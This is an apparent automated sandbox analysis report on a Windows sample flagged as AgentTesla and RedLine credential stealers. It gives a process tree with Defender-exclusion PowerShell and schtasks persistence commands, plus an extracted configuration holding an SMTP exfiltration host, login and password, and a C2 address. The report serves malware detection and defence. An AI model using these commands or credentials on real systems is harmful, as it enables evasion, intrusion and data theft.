Edit tour

Windows Analysis Report
RJKUWSGxej.exe

Overview

General Information

Sample name:	RJKUWSGxej.exe renamed because original name is a hash value
Original sample name:	5a1e020c5c5ad435e9bb8cd1d76d10a88f9312f2622ddcaf4b4b559e37e8a992.exe
Analysis ID:	1587629
MD5:	5f573a664988c7ae35ec36f0e619728e
SHA1:	e9af094474fdb64ae89014abfd7fc67aff7b4324
SHA256:	5a1e020c5c5ad435e9bb8cd1d76d10a88f9312f2622ddcaf4b4b559e37e8a992
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected RedLine Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Drops PE files to the user root directory

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Queries random domain names (often used to prevent blacklisting and sinkholes)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Writes to foreign memory regions

Yara detected Generic Downloader

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Connects to many different domains

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Spawns drivers

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

RJKUWSGxej.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\RJKUWSGxej.exe" MD5: 5F573A664988C7AE35EC36F0E619728E)

conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7136 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

jsc.exe (PID: 5100 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)

server_BTC.exe (PID: 7044 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 7324 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7748 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7352 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 7540 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 7548 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD8B.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7628 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

neworigin.exe (PID: 7012 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

build.exe (PID: 7112 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)

armsvc.exe (PID: 2144 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 3A91CBC10690CDD19D04F068C7B34C44)

alg.exe (PID: 5084 cmdline: C:\Windows\System32\alg.exe MD5: D0C2B68B793CE73C9F58FC7242DA51A1)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 6800 cmdline: C:\Windows\system32\AppVClient.exe MD5: CB68C66813352D55FED8EE293621ED26)

TrojanAIbot.exe (PID: 7660 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

elevation_service.exe (PID: 7920 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 350F873C39FAF143D500811678A86FC0)

maintenanceservice.exe (PID: 7980 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 1ACA52915DC5A84234E34BB426FEF8DF)

TrojanAIbot.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Threatname: RedLine

{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\build.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\build.exe	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x24cc3:$gen01: ChromeGetRoamingName 0x24ce8:$gen02: ChromeGetLocalName 0x24d2b:$gen03: get_UserDomainName 0x28bc4:$gen04: get_encrypted_key 0x27943:$gen05: browserPaths 0x27c19:$gen06: GetBrowsers 0x27501:$gen07: get_InstalledInputLanguages 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x296be:$spe9: wallet 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000000.1892134419.0000000000C82000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000002.3160951501.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3160951501.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: jsc.exe PID: 5100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jsc.exe PID: 5100	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: jsc.exe PID: 5100	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 7012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 7012	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: build.exe PID: 7112	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7324	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.jsc.exe.3879580.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.jsc.exe.3879580.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.jsc.exe.3879580.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.jsc.exe.3879580.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.jsc.exe.3879580.2.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x61ed3:$gen01: ChromeGetRoamingName 0x61ef8:$gen02: ChromeGetLocalName 0x61f3b:$gen03: get_UserDomainName 0x65dd4:$gen04: get_encrypted_key 0x64b53:$gen05: browserPaths 0x64e29:$gen06: GetBrowsers 0x64711:$gen07: get_InstalledInputLanguages 0x30b37:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x60bdc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x40228:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x66216:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x662b4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x668ce:$spe9: wallet 0x5ebfa:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x5f124:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x5f1d1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x5eba8:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x5ebd1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x5eda2:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x5eff5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x5f2e4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
5.2.jsc.exe.3879580.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.jsc.exe.38b6790.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.jsc.exe.38b6790.1.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x24cc3:$gen01: ChromeGetRoamingName 0x24ce8:$gen02: ChromeGetLocalName 0x24d2b:$gen03: get_UserDomainName 0x28bc4:$gen04: get_encrypted_key 0x27943:$gen05: browserPaths 0x27c19:$gen06: GetBrowsers 0x27501:$gen07: get_InstalledInputLanguages 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x296be:$spe9: wallet 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
13.0.neworigin.exe.ad0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.0.neworigin.exe.ad0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
13.0.neworigin.exe.ad0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
14.0.build.exe.c80000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.0.build.exe.c80000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x24cc3:$gen01: ChromeGetRoamingName 0x24ce8:$gen02: ChromeGetLocalName 0x24d2b:$gen03: get_UserDomainName 0x28bc4:$gen04: get_encrypted_key 0x27943:$gen05: browserPaths 0x27c19:$gen06: GetBrowsers 0x27501:$gen07: get_InstalledInputLanguages 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x296be:$spe9: wallet 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
5.2.jsc.exe.38b6790.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.jsc.exe.38b6790.1.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x22ec3:$gen01: ChromeGetRoamingName 0x22ee8:$gen02: ChromeGetLocalName 0x22f2b:$gen03: get_UserDomainName 0x26dc4:$gen04: get_encrypted_key 0x25b43:$gen05: browserPaths 0x25e19:$gen06: GetBrowsers 0x25701:$gen07: get_InstalledInputLanguages 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x27206:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x272a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x278be:$spe9: wallet 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x1fbc1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x1fd92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x1ffe5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x202d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
5.2.jsc.exe.3879580.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.jsc.exe.3879580.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.jsc.exe.3879580.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RJKUWSGxej.exe", ParentImage: C:\Users\user\Desktop\RJKUWSGxej.exe, ParentProcessId: 6848, ParentProcessName: RJKUWSGxej.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 7136, ProcessName: powershell.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 7044, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 7044, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7352, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 7012, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RJKUWSGxej.exe", ParentImage: C:\Users\user\Desktop\RJKUWSGxej.exe, ParentProcessId: 6848, ParentProcessName: RJKUWSGxej.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 7136, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:01:37.087261+0100	2051649	1	A Network Trojan was detected	192.168.2.4	60692	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:01:34.352890+0100	2051648	1	A Network Trojan was detected	192.168.2.4	52171	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
